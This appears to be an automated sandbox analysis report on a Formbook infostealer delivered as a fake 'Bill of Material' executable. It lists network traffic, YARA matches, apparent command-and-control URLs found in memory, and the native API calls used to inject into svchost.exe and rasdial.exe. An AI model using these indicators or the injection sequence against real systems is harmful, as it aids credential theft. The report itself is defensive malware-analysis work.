                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3PgWsCnBi2es6aZ7e8KlEO0oRyL%2F2KXT9jiiBh1JGMSAL6QJLc1KaBHdFZipqvev8TzOm5jlMvPYax1W4gSvW0MFv7b2f2hWYZgVPNB1JNHuuIKcR5I%2BQ2Uo9arhdu%2BYqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8b790b9a6b2c72a4-EWR
                alt-svc: h3=":443"; ma=86400
                Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 06:29:02 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                Accept-Ranges: bytes
                Vary: Accept-Encoding
                Content-Encoding: gzip
                Content-Length: 836
                Content-Type: text/html
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 06:29:05 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                Accept-Ranges: bytes
                Vary: Accept-Encoding
                Content-Encoding: gzip
                Content-Length: 836
                Content-Type: text/html
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 06:29:07 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                Accept-Ranges: bytes
                Vary: Accept-Encoding
                Content-Encoding: gzip
                Content-Length: 836
                Content-Type: text/html
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Fri, 23 Aug 2024 06:29:10 GMT
                Server: Apache
                Upgrade: h2,h2c
                Connection: Upgrade, close
                Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                Accept-Ranges: bytes
                Content-Length: 2361
                Vary: Accept-Encoding
                Content-Type: text/html
            Source: rasdial.exe, 00000006.00000002.4653099996.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004648000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://anaidittrich.com/qpwk/?mV=ZpN4DLSXOzy8qX&Xn70_=Pn8OF1j/flre3VeYQ8gIXKcN0tGdbcqXadgaNymjhjlyVv
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005144000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000003694000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2819411569.0000000023E84000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005C42000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004192000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://nginx.net/
            Source: GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004192000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.redhat.com/
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005C42000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004192000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.redhat.com/docs/manuals/enterprise/
            Source: GQXHQykfhUHHi.exe, 00000007.00000002.4654251110.000000000577C000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.tadalaturbo.online
            Source: GQXHQykfhUHHi.exe, 00000007.00000002.4654251110.000000000577C000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.tadalaturbo.online/7o3y/
            Source: GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004000000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.xforum.tech/647x/?mV=ZpN4DLSXOzy8qX&Xn70_=FnaXBox54
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://api.w.org/
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://es.wordpress.org/
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/o
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: rasdial.exe, 00000006.00000003.2709631062.00000000079D4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033b
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002A74000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-1
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/acerca-de/
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/blog/
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/comments/feed/
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/contacto/
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/feed/
            Source: GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/wp-json/
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://mgmasistencia.com/xmlrpc.php?rsd
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005F66000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000044B6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://tilda.cc
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://twitter.com/wordpress
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://wordpress.org/
            Source: rasdial.exe, 00000006.00000002.4653099996.000000000628A000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000047DA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.551108k5.shop/0or4/?Xn70_=Ap9XVhmqGkofKqiV5m9YIo/
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: rasdial.exe, 00000006.00000003.2714492070.00000000079FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000006740000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.0000000004C90000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.hostgator.com.br
            Source: rasdial.exe, 00000006.00000002.4653099996.0000000005468000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4652227627.00000000039B8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.instagram.com/explore/tags/wordcamp/
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003AEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003AEAFF
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003AED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003AED6A
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_0039AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0039AA57
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_003C9576

            E-Banking Fraud

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2527501783.0000000006980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.4654251110.00000000056E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.4651596001.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.4651797494.0000000002EF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2526291195.0000000003C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2527501783.0000000006980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4654251110.00000000056E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4651596001.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4651797494.0000000002EF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2526291195.0000000003C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Copy of 01. Bill of Material - 705.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Copy of 01. Bill of Material - 705.exe, 00000000.00000000.2165916100.00000000003F2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_f88ec9d2-1
            Source: Copy of 01. Bill of Material - 705.exe, 00000000.00000000.2165916100.00000000003F2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d5e381bf-1
            Source: Copy of 01. Bill of Material - 705.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_703b15ea-a
            Source: Copy of 01. Bill of Material - 705.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_742abbec-9
            Source: initial sample | Static PE information: Filename: Copy of 01. Bill of Material - 705.exe
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C1A3 NtClose,2_2_0042C1A3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872B60 NtClose,LdrInitializeThunk,2_2_03872B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03872DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03872C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038735C0 NtCreateMutant,LdrInitializeThunk,2_2_038735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03874340 NtSetContextThread,2_2_03874340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03874650 NtSuspendThread,2_2_03874650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872B80 NtQueryInformationFile,2_2_03872B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872BA0 NtEnumerateValueKey,2_2_03872BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872BE0 NtQueryValueKey,2_2_03872BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872BF0 NtAllocateVirtualMemory,2_2_03872BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872AB0 NtWaitForSingleObject,2_2_03872AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872AD0 NtReadFile,2_2_03872AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872AF0 NtWriteFile,2_2_03872AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872F90 NtProtectVirtualMemory,2_2_03872F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872FA0 NtQuerySection,2_2_03872FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872FB0 NtResumeThread,2_2_03872FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872FE0 NtCreateFile,2_2_03872FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872F30 NtCreateSection,2_2_03872F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872F60 NtCreateProcessEx,2_2_03872F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872E80 NtReadVirtualMemory,2_2_03872E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872EA0 NtAdjustPrivilegesToken,2_2_03872EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872EE0 NtQueueApcThread,2_2_03872EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872E30 NtWriteVirtualMemory,2_2_03872E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872DB0 NtEnumerateKey,2_2_03872DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872DD0 NtDelayExecution,2_2_03872DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872D00 NtSetInformationFile,2_2_03872D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872D10 NtMapViewOfSection,2_2_03872D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872D30 NtUnmapViewOfSection,2_2_03872D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872CA0 NtQueryInformationToken,2_2_03872CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872CC0 NtQueryVirtualMemory,2_2_03872CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872CF0 NtOpenProcess,2_2_03872CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872C00 NtQueryInformationProcess,2_2_03872C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03872C60 NtCreateKey,2_2_03872C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03873090 NtSetValueKey,2_2_03873090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03873010 NtOpenDirectoryObject,2_2_03873010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_038739B0 NtGetContextThread,2_2_038739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03873D10 NtOpenProcessToken,2_2_03873D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03873D70 NtOpenThread,2_2_03873D70
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A4650 NtSuspendThread,LdrInitializeThunk,6_2_047A4650
            Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_047A4340 NtSetContextThread,LdrInitializeThunk,6_2_047A4340
